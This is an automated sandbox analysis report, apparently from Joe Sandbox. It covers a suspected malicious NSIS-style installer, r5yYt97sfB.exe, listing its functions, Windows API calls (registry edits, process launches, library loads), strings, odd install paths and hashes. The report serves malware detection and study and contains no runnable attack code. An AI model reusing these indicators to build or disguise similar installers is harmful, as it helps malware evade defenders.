Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user~1\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
API String ID: 3449924974-875112913
Opcode ID: 7075ef3404a36deb5860a48c063ce1528caeb3231ff3312c7ad9e757cbb6b53e
Instruction ID: 9d8b3aa145bda6eaeb46bbd44b0caf250caa68881350f4f3315e0aaa1c0c1a31
Opcode Fuzzy Hash: 7075ef3404a36deb5860a48c063ce1528caeb3231ff3312c7ad9e757cbb6b53e
Instruction Fuzzy Hash: 400108B1D00619EADF10DBA0D9087EFBFB8EF04314F00803AD945B6190D77996588FA9

Function 0040237B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
lstrlenW.KERNEL32(artikulationer\Udsorteringerne,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
RegSetValueExW.ADVAPI32(?,?,?,?,artikulationer\Udsorteringerne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
RegCloseKey.ADVAPI32(?,?,?,artikulationer\Udsorteringerne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Strings

artikulationer\Udsorteringerne, xrefs: 004023CA, 004023D8, 004023EF, 004023FF, 0040240A

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: artikulationer\Udsorteringerne
API String ID: 1356686001-2681483848
Opcode ID: 6e5ea9d93eb3cb9a957931279c0ba2d85e54e050eb0ba23687cbe03c42da21f9
Instruction ID: 75ab489ca3c386883e02df54fe3069bb457763bdb47647990c5a7a2e11d383c6
Opcode Fuzzy Hash: 6e5ea9d93eb3cb9a957931279c0ba2d85e54e050eb0ba23687cbe03c42da21f9
Instruction Fuzzy Hash: B8118E71A00108BFEB10AFA5DE89EAE777DEB44358F11403AF904B71D1D6B85E409668

Function 00402BFF Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
RegCloseKey.ADVAPI32(?), ref: 00402C65
RegCloseKey.ADVAPI32(?), ref: 00402C8A
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: ee17cb36fc74d046e0919beb455f6a1255652c66a39e7c6080990b88bc0e6a76
Instruction ID: 55d087fd23a1ea4965d22b091416ffa41740a626a207a29a44af1da89c0b6843
Opcode Fuzzy Hash: ee17cb36fc74d046e0919beb455f6a1255652c66a39e7c6080990b88bc0e6a76
Instruction Fuzzy Hash: B3116771504118FFEF20AF90DF8CEAE3B79FB14384B10043AF905B20A0D7B48E55AA29

Function 004031EF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403203

Part of subcall function 0040336E: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403119,00000004,00000000,00000000,0040A230,?,00403093,000000FF,00000000,00000000,?,?), ref: 00403236
SetFilePointer.KERNELBASE(00A494B5,00000000,00000000,00414EF0,00004000,?,00000000,00403119,00000004,00000000,00000000,0040A230,?,00403093,000000FF,00000000), ref: 00403331

Strings

}UI, xrefs: 00403242, 004032AF

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: FilePointer$CountTick
String ID: }UI
API String ID: 1092082344-1805939252
Opcode ID: 1d6b410ec908590b26d0e6386832776f3ccc0075e6ffb3c2499094a24fe2f275
Instruction ID: 2f989109dca0f14896005150ea4b142ee5491df85de4bcb3d025a191183ef828
Opcode Fuzzy Hash: 1d6b410ec908590b26d0e6386832776f3ccc0075e6ffb3c2499094a24fe2f275
Instruction Fuzzy Hash: 6F317A72500215DFCB109F69EEC496A3BAAF74475A714423FE900B22E0CB799D05DB9D

Function 00406050 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,: Completed,?,004062C3,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 0040607A
RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,004062C3,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 0040609B
RegCloseKey.ADVAPI32(?,?,004062C3,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 004060BE

Strings

: Completed, xrefs: 00406053

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: : Completed
API String ID: 3677997916-2954849223
Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction ID: dd2034eab93442e05d5faf4c8c2bb259ab57cbcddbd304a2a07cf8a1e20057b8
Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction Fuzzy Hash: 00015A3119020AEACF21CF26ED08EDB3BACEF44350F01403AF945D2260D735D968CBA6

Function 00405D87 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405DA5
GetTempFileNameW.KERNELBASE(0040A230,?,00000000,?,?,?,00000000,004033B4,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004035E2), ref: 00405DC0

Strings

nsa, xrefs: 00405D94
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405D8C

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user~1\AppData\Local\Temp\$nsa
API String ID: 1716503409-3083371207
Opcode ID: a547c736c8f6b5c9f15055ff18df3ea68e155a79a10597bb1e750add09701d99
Instruction ID: 39f60503b2430839de46f7700192694fdf55f3390a305a77e996ee432cf1c3a1
Opcode Fuzzy Hash: a547c736c8f6b5c9f15055ff18df3ea68e155a79a10597bb1e750add09701d99
Instruction Fuzzy Hash: 00F01D76701608BFDB108F59DD09A9BB7A8EFA5710F10803BEA41E7190E6B49A54CB64

Function 004064ED Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406504
wsprintfW.USER32 ref: 0040653F
LoadLibraryW.KERNELBASE(?), ref: 0040654F

Strings

%s%S.dll, xrefs: 00406539

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll
API String ID: 2200240437-2744773210
Opcode ID: 09826aabd0149e8bfb8f53993160eab8b7fb3c89a4591f3bb3682bc3d10a664a
Instruction ID: 11474a94a5346637ca65755d9fadb0746d9ddd5a59e85512782e335858fea3cf
Opcode Fuzzy Hash: 09826aabd0149e8bfb8f53993160eab8b7fb3c89a4591f3bb3682bc3d10a664a
Instruction Fuzzy Hash: 11F0BB7050011AA7CB14EB68ED0DDAF3AACAB00304F51447A9546F20D5EB7CDA65CBA8

Function 00401E66 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004052E2: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
Part of subcall function 004052E2: lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
Part of subcall function 004052E2: SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D

Part of subcall function 00405863: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,Error launching installer), ref: 0040588C
Part of subcall function 00405863: CloseHandle.KERNEL32(0040A230), ref: 00405899

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: 73a2db533e28582b59bffcf672c1af26545eacf5a16fa5e71084c627cf33175b
Instruction ID: 6eadcb4e995b32aeec71f8dd92363e70dac4c12fa3ca33f02f681fc447c81ee3
Opcode Fuzzy Hash: 73a2db533e28582b59bffcf672c1af26545eacf5a16fa5e71084c627cf33175b
Instruction Fuzzy Hash: AE11C831900508EBCF21AFA1CD8499E7B76EF44314F24407BF501B61E1D7798A92DB9D

Function 004015B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405BE2: CharNextW.USER32(?,?,00425F50,Error writing temporary file. Make sure your temp folder is valid.,00405C56,00425F50,00425F50,771B3420,?,771B2EE0,00405994,?,771B3420,771B2EE0,"C:\Users\user\Desktop\r5yYt97sfB.exe"), ref: 00405BF0
Part of subcall function 00405BE2: CharNextW.USER32(00000000), ref: 00405BF5
Part of subcall function 00405BE2: CharNextW.USER32(00000000), ref: 00405C0D

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612

Part of subcall function 004057B1: CreateDirectoryW.KERNELBASE(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user~1\AppData\Local\Temp\), ref: 004057F4

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto,?,00000000,000000F0), ref: 00401645

Strings

C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto, xrefs: 00401638

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto
API String ID: 1892508949-576767988
Opcode ID: 5baa3a048ccbd20e590b93de0caadb45672d703fd938becdea7bafa1427ea88e
Instruction ID: a2f5b5d24782e44cfe925c0e95e15c4f451f46d0d0cd4eeea64ba36cf6c5c766
Opcode Fuzzy Hash: 5baa3a048ccbd20e590b93de0caadb45672d703fd938becdea7bafa1427ea88e
Instruction Fuzzy Hash: AC11E631504504EBCF20BFA0CD0199E3AB1EF44364B29453BE945B61F1DA3D8A81DA5E

Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406183: lstrcpynW.KERNEL32(0040A230,0040A230,00000400,00403466,00429260,NSIS Error), ref: 00406190

Part of subcall function 00405BE2: CharNextW.USER32(?,?,00425F50,Error writing temporary file. Make sure your temp folder is valid.,00405C56,00425F50,00425F50,771B3420,?,771B2EE0,00405994,?,771B3420,771B2EE0,"C:\Users\user\Desktop\r5yYt97sfB.exe"), ref: 00405BF0
Part of subcall function 00405BE2: CharNextW.USER32(00000000), ref: 00405BF5
Part of subcall function 00405BE2: CharNextW.USER32(00000000), ref: 00405C0D

lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,771B3420,?,771B2EE0,00405994,?,771B3420,771B2EE0,"C:\Users\user\Desktop\r5yYt97sfB.exe"), ref: 00405C98
GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,771B3420,?,771B2EE0,00405994,?,771B3420,771B2EE0), ref: 00405CA8

Strings

P_B, xrefs: 00405C45

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: P_B
API String ID: 3248276644-906794629
Opcode ID: aac1f31e4ea679f556b64dc22f6bcb2e43e03c5f2aa30b7a8abbf531c7fd0fee
Instruction ID: f871c4b29d4d639395b2ac54a4c1991ea156a0950635a8c86b9a322ad60a2328
Opcode Fuzzy Hash: aac1f31e4ea679f556b64dc22f6bcb2e43e03c5f2aa30b7a8abbf531c7fd0fee
Instruction Fuzzy Hash: 32F0F42510CF111AF62233365D09AAF2558CF82764B5A063FFC51B12D1CA3C9A838C7E

Function 00405863 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,Error launching installer), ref: 0040588C
CloseHandle.KERNEL32(0040A230), ref: 00405899

Strings

Error launching installer, xrefs: 00405876

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: acebcc260901bb8c7477aeb1107a61866cbc161fdefa27c2bb5441bedb54154a
Instruction ID: c820723d4e94d220d757831b92c48145409d5a390a225df4cf368edf7247e646
Opcode Fuzzy Hash: acebcc260901bb8c7477aeb1107a61866cbc161fdefa27c2bb5441bedb54154a
Instruction Fuzzy Hash: 22E046B4600209BFEB10AB60ED49F7B7BADEB04348F408431BD00F2190D778A8148A78

Function 00406C7C Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

